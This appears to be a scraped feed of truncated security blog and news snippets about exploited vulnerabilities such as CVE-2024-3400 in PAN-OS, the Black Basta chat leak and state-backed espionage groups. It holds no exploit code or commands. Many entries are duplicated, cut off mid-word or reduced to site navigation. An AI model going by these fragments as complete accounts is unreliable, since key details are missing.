"After successfully compromising a victim, Silk Typhoon uses the stolen keys and credentials to infiltrate customer networks where they can then abuse a variety of deployed applications, including Microsoft services and others, to achieve their espionage objectives."
## Silk Typhoon storms IT supply chains
Silk Typhoon is a Chinese state-sponsored espionage group known for hacking the U.S. Office of Foreign Assets Control (OFAC) office in early December 2024 and stealing data from the Committee on Foreign Investment in the United States (CFIUS).
Microsoft reports that Silk Typhoon switched tactics around that period, abusing stolen API keys and compromised credentials for IT providers, identity manag
Greynoiseio
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
blogs_greynoiseio·2025-02-26·CVSS 9.8
[CRITICAL] GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Qualys
Defense Lessons From the Black Basta Ransomware Playbook
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook
## Table of Contents
Know Your Enemys Playbook
Attackers Move Fast
How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against evolving
Qualys
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
#### Table of Contents
- Know Your Enemys Playbook
- Attackers Move Fast
- How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against ev
Bleepingcomputer
Over 2,000 Palo Alto firewalls hacked using recently patched bugs
blogs_bleepingcomputer·2024-11-21·CVSS 9.3
CVE-2024-0012 [CRITICAL] Over 2,000 Palo Alto firewalls hacked using recently patched bugs
## Over 2,000 Palo Alto firewalls hacked using recently patched bugs
## Sergiu Gatlan
Hackers have already compromised thousands of Palo Alto Networks firewalls in attacks exploiting two recently patched zero-day vulnerabilities.
The two security flaws are an authentication bypass ( CVE-2024-0012 ) in the PAN-OS management web interface that remote attackers can exploit to gain administrator privileges and a PAN-OS privilege escalation ( CVE-2024-9474 ) that helps them run commands on the firewall with root privileges.
While CVE-2024-9474 was disclosed this Monday, the company first warned customers on November 8 to restrict access to their next-generation firewalls because of a potential RCE flaw (which was tagged last Friday as CVE-2024-0012 ).
Palo Alto Networks is still investigat
Bleepingcomputer
Cisco bug lets hackers run commands as root on UWRB access points
blogs_bleepingcomputer·2024-11-06·CVSS 10.0
CVE-2024-20418 [CRITICAL] Cisco bug lets hackers run commands as root on UWRB access points
## Cisco bug lets hackers run commands as root on UWRB access points
## Sergiu Gatlan
Cisco has fixed a maximum severity vulnerability that allows attackers to run commands with root privileges on vulnerable Ultra-Reliable Wireless Backhaul (URWB) access points that provide connectivity for industrial wireless automation.
Tracked as CVE-2024-20418 , this security flaw was found in Cisco's Unified Industrial Wireless Software's web-based management interface. Unauthenticated threat actors can exploit it in low-complexity command injection attacks that don't require user interaction.
"This vulnerability is due to improper validation of input to the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management int
Bleepingcomputer
Iranian hackers work with ransomware gangs to extort breached orgs
blogs_bleepingcomputer·2024-08-28·CVSS 8.6
[HIGH] Iranian hackers work with ransomware gangs to extort breached orgs
## Iranian hackers work with ransomware gangs to extort breached orgs
## Sergiu Gatlan
An Iran-based hacking group known as Pioneer Kitten is breaching defense, education, finance, and healthcare organizations across the United States and working with affiliates of several ransomware operations to extort the victims.
The threat group (also tracked as Fox Kitten, UNC757, and Parisite) has been active since at least 2017 and is believed to have a suspected nexus to the Iranian government.
As CISA, the FBI, and the Defense Department's Cyber Crime Center warned today in a joint advisory, the attackers are monetizing their access to compromised organizations' networks by selling domain admin credentials and full domain control privileges on cyber marketplaces while using the 'Br0k3r' and,
Tenable
AA24-241A : Joint Cybersecurity Advisory on Iran-based Cyber Actors Targeting US Organizations
blogs_tenable·2024-08-28
AA24-241A : Joint Cybersecurity Advisory on Iran-based Cyber Actors Targeting US Organizations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Cybersecurity Threat Landscape 2024 Midyear Review
blogs_qualys·2024-08-06
Cybersecurity Threat Landscape 2024 Midyear Review
## Table of Contents
Key Takeaways from the Threat Landscape Report 2024
Vulnerability and Threat Analysis in the Cybersecurity Landscape 2024
Cyber Threat Landscape 2024 A Detailed Review
Key Statistics and Their Impact on the 2024 Cybersecurity Landscape
Mid-2024s Most Exploited Vulnerabilities in the Cybersecurity Landscape
Conclusion
As we navigate the complexities of 2024, it’s crucial to pause and reflect on the evolving threat landscape that surrounds us. This moment offers a unique opportunity to scrutinize our triumphs and missteps, understand the events that have decisively shaped our environment, and consider those that have subtly influenced it. By extracting key lessons from our recent experiences, we can fortify our strategies and prepare more effectively for the emerg
Zscaler
CVE-2024-6387 & CVE-2024-6409 | ThreatLabz
blogs_zscaler·2024-08-05·CVSS 8.1
[HIGH] CVE-2024-6387 & CVE-2024-6409 | ThreatLabz
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Tenable
Cybersecurity Snapshot: CISA Tells Tech Vendors To Squash Command Injection Bugs, as OpenSSF Calls on Developers To Boost Security Skills
blogs_tenable·2024-07-12
Cybersecurity Snapshot: CISA Tells Tech Vendors To Squash Command Injection Bugs, as OpenSSF Calls on Developers To Boost Security Skills
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
CISA urges devs to weed out OS command injection vulnerabilities
blogs_bleepingcomputer·2024-07-10·CVSS 6.0
CVE-2024-20399 [MEDIUM] CISA urges devs to weed out OS command injection vulnerabilities
## CISA urges devs to weed out OS command injection vulnerabilities
## Sergiu Gatlan
CISA and the FBI urged software companies on Wednesday to review their products and eliminate path OS command injection vulnerabilities before shipping.
The advisory was released in response to recent attacks that exploited multiple OS command injection security flaws ( CVE-2024-20399 , CVE-2024-3400 , and CVE-2024-21887 ) to compromise Cisco , Palo Alto , and Ivanti network edge devices.
Velvet Ant, the Chinese state-sponsored threat actor that coordinated these attacks, deployed custom malware to gain persistence on hacked devices as part of a cyber espionage campaign.
"OS command injection vulnerabilities arise when manufacturers fail to properly validate and sanitize user input when constructing
Volexity
Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
blogs_volexity·2024-05-15·CVSS 10.0
CVE-2024-3400 [CRITICAL] Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
Memory Forensics
# Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
May 15, 2024
Volexity Threat Research
Last month, Volexity reported on its discovery of zero-day, in-the-wild exploitation of CVE-2024-3400 in the GlobalProtect feature of Palo Alto Networks PAN-OS by a threat actor Volexity tracks as UTA0218. Palo Alto Networks released an advisory and threat protection signature for the vulnerability within 48 hours of Volexity’s disclosure of the issue to Palo Alto Networks, with official patches and fixes following soon after.
Volexity has conducted several additional incident response investigations and proactive analyses of Palo Alto Networks firewall devices since the initial two cases described in Volexity’s blog post. These recent investigatio
Volexity
Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
blogs_volexity·2024-05-15·CVSS 10.0
CVE-2024-3400 [CRITICAL] Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
Memory Forensics
## Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
May 15, 2024
Volexity Threat Research
Last month, Volexity reported on its discovery of zero-day, in-the-wild exploitation of CVE-2024-3400 in the GlobalProtect feature of Palo Alto Networks PAN-OS by a threat actor Volexity tracks as UTA0218. Palo Alto Networks released an advisory and threat protection signature for the vulnerability within 48 hours of Volexity’s disclosure of the issue to Palo Alto Networks, with official patches and fixes following soon after.
Volexity has conducted several additional incident response investigations and proactive analyses of Palo Alto Networks firewall devices since the initial two cases described in Volexity’s blog post . These recent investigat
Zscaler
CVE-2024-3661 | ThreatLabz
blogs_zscaler·2024-05-07·CVSS 7.6
[HIGH] CVE-2024-3661 | ThreatLabz
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Wiz
Crying Out Cloud - May 2024 Newsletter | Wiz
blogs_wiz·2024-05-06·CVSS 10.0
[CRITICAL] Crying Out Cloud - May 2024 Newsletter | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
## 🔎 Highlights
Architecture Risks that May Compromise AI-as-a-Service Providers
Wiz research recently performed a security audit of Hugging Face and discovered several security issues that would have allowed an actor running a specially-crafted malicious model on Hugging Face's infrastructure to achieve remote code execution and cross-tenant access to other customers' spaces or models. All these issues were remediated by Hugging Face and no customer action is required.
Learn more in our blog .
## 🐞 High Profile Vulnerabilities
DoS Vulnerability in HTTP/2 CONTINUATION Frames
Bleepingcomputer
22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
blogs_bleepingcomputer·2024-04-19·CVSS 10.0
CVE-2024-3400 [CRITICAL] 22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
## 22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
## Bill Toulas
Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection vulnerability that has been actively exploited in attacks since at least March 26, 2024.
CVE-2024-3400 is a critical vulnerability impacting specific Palo Alto Networks' PAN-OS versions in the GlobalProtect feature that allows unauthenticated attackers to execute commands with root privileges using command injection triggered by arbitrary file creation.
The flaw was disclosed by Palo Alto Networks on April 12, with the security advisory urging system administrators to apply provided mitigations immediately until a patch was made available.
Depending on th
Zscaler
CVE-2024-3400 Activity | ThreatLabz
blogs_zscaler·2024-04-17·CVSS 10.0
[CRITICAL] CVE-2024-3400 Activity | ThreatLabz
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Bleepingcomputer
Exploit released for Palo Alto PAN-OS bug used in attacks, patch now
blogs_bleepingcomputer·2024-04-16·CVSS 10.0
CVE-2024-3400 [CRITICAL] Exploit released for Palo Alto PAN-OS bug used in attacks, patch now
## Exploit released for Palo Alto PAN-OS bug used in attacks, patch now
## Sergiu Gatlan
Update 4/16/24: Updated story with more information on how previous mitigations do not protect devices.
Exploit code is now available for a maximum severity and actively exploited vulnerability in Palo Alto Networks' PAN-OS firewall software.
Tracked as CVE-2024-3400 , this security flaw can let unauthenticated threat actors execute arbitrary code as root via command injection in low-complexity attacks on vulnerable PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls if the device telemetry and GlobalProtect (gateway or portal) feature are enabled.
While Palo Alto Networks has started releasing hotfixes on Monday to secure unpatched firewalls exposed to attacks, the vulnerability has been exploite
Bleepingcomputer
Palo Alto Networks fixes zero-day exploited to backdoor firewalls
blogs_bleepingcomputer·2024-04-15·CVSS 10.0
CVE-2024-3400 [CRITICAL] Palo Alto Networks fixes zero-day exploited to backdoor firewalls
## Palo Alto Networks fixes zero-day exploited to backdoor firewalls
## Sergiu Gatlan
Palo Alto Networks has started releasing hotfixes for a zero-day vulnerability that has been actively exploited since March 26th to backdoor PAN-OS firewalls.
This maximum severity security flaw ( CVE-2024-3400 ) affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls with device telemetry and GlobalProtect (gateway or portal) enabled.
Unauthenticated threat actors can exploit it remotely to gain root code execution via command injection in low-complexity attacks that don't require user interaction.
"Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability," the company warned on Friday when it disclosed the zero-day.
The company has now fix
Bleepingcomputer
Palo Alto Networks zero-day exploited since March to backdoor firewalls
blogs_bleepingcomputer·2024-04-13·CVSS 10.0
CVE-2024-3400 [CRITICAL] Palo Alto Networks zero-day exploited since March to backdoor firewalls
## Palo Alto Networks zero-day exploited since March to backdoor firewalls
## Lawrence Abrams
Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26, using the compromised devices to breach internal networks, steal data and credentials.
Palo Alto Networks warned yesterday that hackers were actively exploiting an unauthenticated remote code execution vulnerability in its PAN-OS firewall software and that patches would be available on April 14.
As the flaw was being used in attacks, Palo Alto Networks decided to disclose it and release mitigations so customers could protect their devices until patches were complete.
A later report by Volexity, which discovered the zero-day flaw, provides mor
Zscaler
Another CVE (PAN-OS Zero Day) | Zscaler
blogs_zscaler·2024-04-12·CVSS 10.0
[CRITICAL] Another CVE (PAN-OS Zero Day) | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Volexity
Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
blogs_volexity·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
Threat Intelligence
## Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
April 12, 2024
Volexity Threat Research
Volexity would like to thank Palo Alto Networks for their partnership, cooperation, and rapid response to this critical issue. Their research can be found here .
On April 10, 2024, Volexity identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. Volexity received alerts regarding suspect network traffic emanating from the customer’s firewall. A subsequent investigation determined the device had been compromised. The following day, April 11, 2024, Volexity observed further, identical exploitatio
Unit42
Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
blogs_unit42·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
## Executive Summary
This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.
Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.
A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.
This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway o
Tenable
CVE-2024-3400: Zero-Day Vulnerability in Palo Alto Networks PAN-OS GlobalProtect Gateway Exploited in the Wild
blogs_tenable·2024-04-12·CVSS 10.0
[CRITICAL] CVE-2024-3400: Zero-Day Vulnerability in Palo Alto Networks PAN-OS GlobalProtect Gateway Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Volexity
Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
blogs_volexity·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
Threat Intelligence
# Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
April 12, 2024
Volexity Threat Research
> Volexity would like to thank Palo Alto Networks for their partnership, cooperation, and rapid response to this critical issue. Their research can be found here.
On April 10, 2024, Volexity identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. Volexity received alerts regarding suspect network traffic emanating from the customer’s firewall. A subsequent investigation determined the device had been compromised. The following day, April 11, 2024, Volexity observed further, identical exploitatio
Unit42
Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
blogs_unit42·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
Unit 42
Published: April 12, 2024
High Profile Threats
Malware
Vulnerabilities
Backdoor
Command injection
CVE-2024-3400
MidnightEclipse
Python
Upstyle
## Executive Summary
This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.
Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.
A critical command injection vul
Bleepingcomputer
Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks
blogs_bleepingcomputer·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks
## Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks
## Bill Toulas
Today, Palo Alto Networks warns that an unpatched critical command injection vulnerability in its PAN-OS firewall is being actively exploited in attacks.
"Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability," warns the Palo Alto security bulletin.
The flaw, which has been discovered by Volexity and is tracked as CVE-2024-3400, is a command injection vulnerability that received the maximum severity score of 10.0 as it requires no special privileges or user interaction to exploit.
The vendor clarified that the issue affects specific versions of PAN-OS software when both the GlobalProtect gateway and device telemetry features are enabled.
"A
Sentinelone
Black Basta
blogs_sentinelone·2022-11-30
Black Basta
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Recorded Future
Smarter Cybersecurity with IPv6: How Drip Architecture Defeats Spray-and-Pray Attacks
blogs_recorded_future
Smarter Cybersecurity with IPv6: How Drip Architecture Defeats Spray-and-Pray Attacks
# IPv6 Drip Drowns Spray-and-Pray
## AI Hackathons and the Future of Security Architecture
Last week, a few Futurists met up to work out the practical realities of AI-enabled Red Teaming (among other topics). In addition to two days of phenomenal vibe coding in Cursor, the final presentations were light on hyperbole and heavy on capabilities and remarkable outcomes, created in a day or less. Two years ago, when LLMs made their mainstream debut, I was dubious, but the hackathon confirmed recent observations (last three months) that AI is accelerating security workflows (like everything else) at warp speed. Change, soon driven primarily through various agentic flavors, is happening at a pace that is difficult to comprehend.
The flight home was spent considering how to get ahead of the adv
Crowdstrike
CrowdStrike 2025 Global Threat Report: GenAI in Exploits & Cloud Attacks
blogs_crowdstrike
CrowdStrike 2025 Global Threat Report: GenAI in Exploits & Cloud Attacks
Experienced a breach?
Blog
Contact us
Careers
Latest Innovations
Upcoming events
Conference
CrowdTour
Find a city near you
Summit
Day Zero 2026
Las Vegas, NV
Login
Your Cart
Added to Cart
There's nothing in your cart
per endpoint / per year
per endpoint / per month
Login
Experienced a breach?
Blog
Contact us
Careers
Latest Innovations
## How cyber adversaries use GenAI in vulnerability research and cloud operations
Generative Artificial Intelligence (GenAI) is redefining the cybersecurity landscape. And while many organizations like CrowdStrike are using the revolution in large language models (LLMs) to deliver powerful capabilities , adversaries are also using the technology to advance dangerous tools. In the CrowdStrike 2025 Global Threat Report , threat resear
Zscaler
CISO Monthly Roundup, April 2024: ThreatLabz 2024 Phishing Report, PAN-OS zero day, MadMXShell, Black Hat SEO, Pikabot, Zloader, and security advisories | CXO Revolutionaries
blogs_zscaler
CISO Monthly Roundup, April 2024: ThreatLabz 2024 Phishing Report, PAN-OS zero day, MadMXShell, Black Hat SEO, Pikabot, Zloader, and security advisories | CXO Revolutionaries
## CISO Monthly Roundup, April 2024: ThreatLabz 2024 Phishing Report, PAN-OS zero day, MadMXShell, Black Hat SEO, Pikabot, Zloader, and security advisories
Deepen Desai
Contributor
Zscaler
## May 6, 2024
CISO Monthly Roundup, April 2024: ThreatLabz 2024 Phishing Report, PAN-OS zero day, MadMXShell, Black Hat SEO, Pikabot, Zloader, and security advisories
The CISO Monthly Roundup provides the latest threat research from the ThreatLabz team, along with CISO insights on other cyber-related subjects. Over the past month ThreatLabz released their 2024 Phishing Report, examined the PAN-OS zero day, and analyzed MadMXShell, Black Hat SEO, Pikabot, and Zloader. For those attending RSA, I will be presenting on recent APT attacks on May 9th at 12:20PM.
## Zscaler ThreatLabz 2024 Phishing Repo
Recorded Future
TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies | Recorded Future
blogs_recorded_future·CVSS 10.0
[CRITICAL] TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies | Recorded Future
## TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies
Summary
Recorded Future’s Insikt Group identified a suspected cyber-espionage campaign by TAG-100, targeting global government and private sector organizations. TAG-100 exploited internet-facing devices and used open-source tools like the Go backdoor Pantegana. The campaign compromised two Asia-Pacific intergovernmental organizations and targeted multiple diplomatic and trade entities.
## TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies
TAG-100 employs open-source remote access capabilities and exploits various internet-facing devices to gain initial access. This activity highlights
Crowdstrike
What You Need to Know About the Critical PAN-OS Zero-Day
blogs_crowdstrike·CVSS 10.0
CVE-2024-3400 [CRITICAL] What You Need to Know About the Critical PAN-OS Zero-Day
## CVE-2024-3400: What You Need to Know About the Critical PAN-OS Zero-Day
## Assess risk exposure and rapidly identify exposed PAN-OS assets with CrowdStrike Falcon® Exposure Management
April 13, 2024
Recorded Future
Smarter Cybersecurity with IPv6: How Drip Architecture Defeats Spray-and-Pray Attacks
blogs_recorded_future
Smarter Cybersecurity with IPv6: How Drip Architecture Defeats Spray-and-Pray Attacks
## IPv6 Drip Drowns Spray-and-Pray
## AI Hackathons and the Future of Security Architecture
Last week, a few Futurists met up to work out the practical realities of AI-enabled Red Teaming (among other topics). In addition to two days of phenomenal vibe coding in Cursor , the final presentations were light on hyperbole and heavy on capabilities and remarkable outcomes, created in a day or less. Two years ago, when LLMs made their mainstream debut, I was dubious, but the hackathon confirmed recent observations (last three months) that AI is accelerating security workflows (like everything else) at warp speed. Change, soon driven primarily through various agentic flavors, is happening at a pace that is difficult to comprehend.
The flight home was spent considering how to get ahead of the a
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
NoiseLetter April 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Sentinelone
Black Basta
blogs_sentinelone
Black Basta
# Black Basta Ransomware: In-Depth Analysis, Detection, and Mitigation
## Summary of Black Basta Ransomware
Black Basta first emerged in early 2022. The ransomware family is an evolution of the Hermes/Ryuk/Conti families. Black Basta was heavily advertised in underground cybercrime markets. Black Basta practices double extortion – demanding payment for a decryptor, as well as for the non-release of stolen data. There are Windows and LInux variants of Black Basta ransomware. The group is responsible for hundreds of attacks against global targets of varying sectors.
February 2025 Update: Nearly a year’s worth of Black Basta chat logs have been released on Telegram, providing detailed insight into the groups operational workflow, reconnaissance activities, and specific userID and details o
Zscaler
VPN Risk Report Highlights Concerns About Unsafe VPNs
blogs_zscaler
VPN Risk Report Highlights Concerns About Unsafe VPNs
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
